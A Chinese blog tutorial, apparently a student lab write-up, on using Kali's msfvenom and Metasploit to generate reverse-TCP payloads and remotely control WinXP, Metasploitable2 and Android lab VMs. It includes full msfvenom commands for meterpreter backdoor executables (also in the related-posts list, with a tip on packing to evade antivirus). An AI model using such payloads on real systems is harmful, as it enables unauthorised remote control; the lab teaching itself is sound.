Kali Linux远程控制

已于 2023-06-28 22:19:02 修改
阅读量2.2k 收藏 26
点赞数 4
文章标签: 服务器 运维
于 2023-06-12 15:12:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_71207842/article/details/131167919
版权

目录

前言:

如何使用msfvenom生成被控端并进行远程控制

在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)

一、前导练习:

1、查看帮助信息

2、查看所有可以使用的攻击模块

3、筛选出使用reverse_tcp的模块

二、 为什么6200端口变成了一个“后门”

         三、生成windows系统下的被控端并进行远程控制

        1、生成Windows操作系统下的被控端并放入目标靶机运行

 方法一: 将被控端payload.exe生成到/var/payload.exe

 方法二:将被控端winpayload.exe生成到网站的目录(/var/www/html/)下,然后到靶机中用浏览器下载并运行。

        2、启动主控端

(1)启动metasploit,进入metasploit(msf)的控制台。

         (2)使用handler模块,然后配置参数。

       3、控制目标靶机(WinXPenSP3)

         四. 生成linux系统下的被控端并进行远程控制

      1、生成linux操作系统下的被控端并放入目标靶机运行

1、查看linux的攻击载荷

2、生成被控端

      2、启动主控端

1、启动metasploit,进入metasploit(msf)的控制台。

2、使用handler模块,然后配置参数。

      3、到目标靶机(Metasploitable2-Linux)下载攻击载荷并运行

1、下载被控端

2、查看被控端是否给了执行权限,没给则需要添加执行权限。

3、运行被控端

      4、控制目标靶机(Metasploitable2-Linux)

输入shell,执行各种命令,如查看操作系统信息、磁盘信息、关闭系统等。

         五、生成android系统下的被控端并进行远程控制

      1、生成android操作系统下的被控端并放入目标靶机运行

1、查看android的攻击载荷(只查看使用reverse_tcp)

2、生成被控端

      2、启动主控端

1、启动metasploit,进入metasploit(msf)的控制台。

2、使用handler模块,然后配置参数。

      3、到目标靶机(android-86_64-7.1-r5)下载攻击载荷并运行

1、下载被控端

2、运行被控端

      4、控制目标靶机(android-86_64-7.1-r5)

1、输入:shell

2、查看当前用户名

3、查看操作系统信息

5、尝试切换到root用户

前言:

如果可以选择的话,你觉得黑客最希望对目标系统做些什么呢?

1、让目标系统上的服务崩溃。

2、在目标系统上执行某个程序。

3、直接控制目标系统。

是不是第3个选择是最激动人心的呢?确实,黑客最喜欢做的事情就是在目标系统上运行一个远程控制程序,从而直接控制目标系统。远程控制程序是一个很常见的计算机用语,指的就是可以在一台设备上操控另一台设备的软件。我们平时在windows操作系统上运行的软件大都是EXE文件,而在Android操作系统上运行的软件大都是APK文件。显然你制造的一个用于windows操作系统下的远程操控被控端对于手机的Android操作系统是毫无作用的。目前常见的操作系统主要有windows、Android、iOS,以及各种版本的Linux操作系统。

如何使用msfvenom生成被控端并进行远程控制

在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)

一、前导练习:

  1. 1、查看帮助信息

  3. 2、查看所有可以使用的攻击模块

  5. 3、筛选出使用reverse_tcp的模块

二、 为什么6200端口变成了一个“后门”

Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)

  1. 使用Netcat扫描某IP地址的指定端口

  1. 使用Netcat连接指定IP地址的指定端口

I:激活笑脸漏洞,使其开启6200端口:

编写python脚本(文件名:backdoor.py):

  

执行并验证:

(图)

 I: 显示指定目录下的内容

 II: 尝试其它测试命令

三、生成windows系统下的被控端并进行远程控制

测试windows系统实验使用的网络环境,填写以下IP地址:

测试用windows系统(WinXPenSP)的IP:   192.168.17.128 

虚拟机Kali Linux 2的IP:  192.168.17.129            

  1. 1、生成Windows操作系统下的被控端并放入目标靶机运行

  2. options(选项):

    -p   指定要生成的攻击荷载(payload)

    -f   输出格式(format)

    -o   输出(out)存储payload的位置

 方法一: 将被控端payload.exe生成到/var/payload.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.17.129 lport=20000 -f exe -o /var/www/html/winpayload.exe

 方法二:将被控端winpayload.exe生成到网站的目录(/var/www/html/)下,然后到靶机中用浏览器下载并运行。

(1)将被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)下

(2)检查apache2服务是否启动:systemctl status apache2.service

(3)启动apache2服务:systemctl start apache2.service

(4)到靶机WinXP

最低0.47元/天 解锁文章
21计算机网络2班曹婷婷
关注
  • 4
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali系列之root账户ssh远程登录配置.docx
12-06
新版kali安装时root账户默认密码为空,根据密码安全策略密码为空时不能登录,登录时会报错,默认情况下ssh服务关闭。本文介绍了如何设置root密码以及配置并开启ssh服务。
《网络安全与渗透测试》课堂笔记---05
zhaotiannuo_1998的博客
04-18 521
2019/4/18- - - 关于kali linux利用MS17-010“永恒之蓝”的渗透攻击windows7,实现远程登录的效果。 以及如何防护等内容。 此文章是用于课堂实验,切勿违法犯罪 1、“永恒之蓝”的介绍 “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作, 只要开机上网,不法分子就能在电脑和...
如何使用Kali远程桌面访问Windows 10或11
最新发布
美国主机评测
04-18 1219
远程桌面协议 (RDP) 可在所有 Windows 系统上使用,因为它是由 Microsoft 开发的,用于像物理系统一样连接和使用远程可用的 Windows 系统。但是,要检查防火墙是否允许该应用程序,你可以转到Windows“开始”菜单并搜索“允许应用程序通过防火墙”,出现后单击将其打开。在本教程中,我们将使用 Remmina 在 Kali Linux 上轻松使用远程桌面协议。更新系统后,使用系统默认的APT包管理器安装Remmina软件,该软件可以通过Kali Linux的默认系统存储库安装。
模拟黑客使用Kali Linux远程控制Windows(互联网)
HKBlackeagle的专栏
01-29 3193
通过内网穿透实现kali控制windows
kali生成后门远程控制电脑或手机
wutiangui的博客
05-07 3335
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).点击.exe文件直接运行安装,运行,下一步,直接完成安装。Android模拟器(靶机1):192.168.0.106。2.1首先从官网上下载模拟器雷电地址点击打开链接。靶机:192.168.25.106。二、环境配置二Android模拟器。
Kali远程操纵win7
2301_81475812的博客
03-28 510
攻击方:kali IPV4:192.168.92.133被攻击方:win7 IPV4:192.168.92.130。
远程连接无法连接到远程计算机_Windows系统远程连接,多人同时远程且互不影响...
weixin_39982269的博客
11-14 934
起因因为有粉丝有这个需求,因此今天抽了一点时间给大家将这个教程整理出来,希望能帮助大家解决多人同时远程一台电脑的问题。原理就是,首先创建多个用户,给每一个用户分配权限,设置windows系统最大远程连接数即可。下面是详细操作手册,建议大家收藏。Windows系统创建新用户直接点击电脑左下角的开始菜单,找到运行程序,或者直接按键盘 win+r 组合,弹出运行窗口,人如下图所示,然后输入如下命令 lu...
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 4025
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
Kali Linux使用Xshell连接
07-22
使用 Xshell 连接 Kali Linux 可以实现远程访问和控制 Kali Linux 系统,提高工作效率和安全性。本文将详细介绍如何使用 Xshell 连接 Kali Linux。 一、SSH 服务配置 Kali Linux 系统默认情况下不开启 SSH 服务,...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务012:基本工具-远程控制、NCAT、WIRESHARK、WIRESHARK-筛选器、常见协议.mp4 │ 任务013:基本工具-常见协议包、WIRESHARK-TCP.mp4 │ 任务014:WIRESHARK-信息统计、实践.mp4 │ 任务015:TCPDUMP-抓包、...
kali-linux-web-pentest-cookbook
06-24
7. **Webshell使用**:介绍如何使用和隐藏Webshell,以便在目标系统中进行远程控制。 8. **安全防护与加固**:除了攻击,书中也会提供关于如何修复漏洞、加强Web应用安全性的建议,包括配置防火墙、实施安全策略等...
linux系统下,11款常见远程桌面控制软件
08-20
linux系统下,11款常见远程桌面控制软件linux系统下,11款常见远程桌面控制软件
linux 远程终端控制工具
03-10
简单方便的linux远程连接控制工具,文本界面。
Linux的远程管理工具
03-28
NULL 博文链接:https://duckyning.iteye.com/blog/1236655
VNC Linux远程桌面
11-09
VNC是在基于UNIX和Linux操作系统的免费的开放源码软件,远程控制能力强大,高效实用,其性能可以和Windows和MAC中的任何远程控制软件媲美。 在Linux中,VNC包括以下四各命令:vncserver,vncviewer,vncpasswd,和...
安卓——Kali_linux操作文档.zip
10-25
《安卓与Kali Linux操作详解》 在网络安全领域,Kali Linux是一款广为人知的渗透测试和安全审计操作系统。而将Kali Linux与安卓设备相结合,可以实现移动渗透测试,大大扩展了黑客工具的使用场景。本文档将深入探讨...
Kali Linux 使用远程桌面连接——xrdp&xfce
热门推荐
Imagine Miracle的博客
05-06 1万+
Kali Linux 开启远程桌面服务
kali linux使用Metasploit进行会话管理
m0_74388365的博客
05-31 545
Metasploit是一个非常方便快捷的工具,可以通过简短的命令来快捷与对方的电脑进行会话建立与操控来达到自己想要的目的,看起来有点麻烦,但是熟悉流程之后却非常便利,还需要我们多多练习达到熟练掌握这门技术。
Kali开启远程服务,新鲜出炉的蚂蚁金服面经
m0_60607562的博客
04-05 405
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
kali+linux渗透测试靶机
09-20
Kali Linux是一种专门用于渗透测试和网络安全的操作系统,它内置了许多用于渗透测试的工具。如果你想使用Kali Linux作为靶机进行渗透测试,可以按照以下步骤进行设置: 1. 首先,下载Kali Linux的ISO文件并创建一个启动盘。 2. 在启动时,选择从启动盘启动计算机,并选择进入Kali Linux的Live模式。 3. 在Live模式下,打开终端并输入以下命令以更新系统和安装必要的工具: ``` sudo apt update sudo apt upgrade sudo apt install kali-linux-default ``` 4. 安装完成后,可以使用Kali Linux中的各种渗透测试工具进行测试。 请注意,在进行任何渗透测试之前,你必须确保你有相关的法律授权,并且只在你有权限的系统上进行测试。非法的渗透测试是违法行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值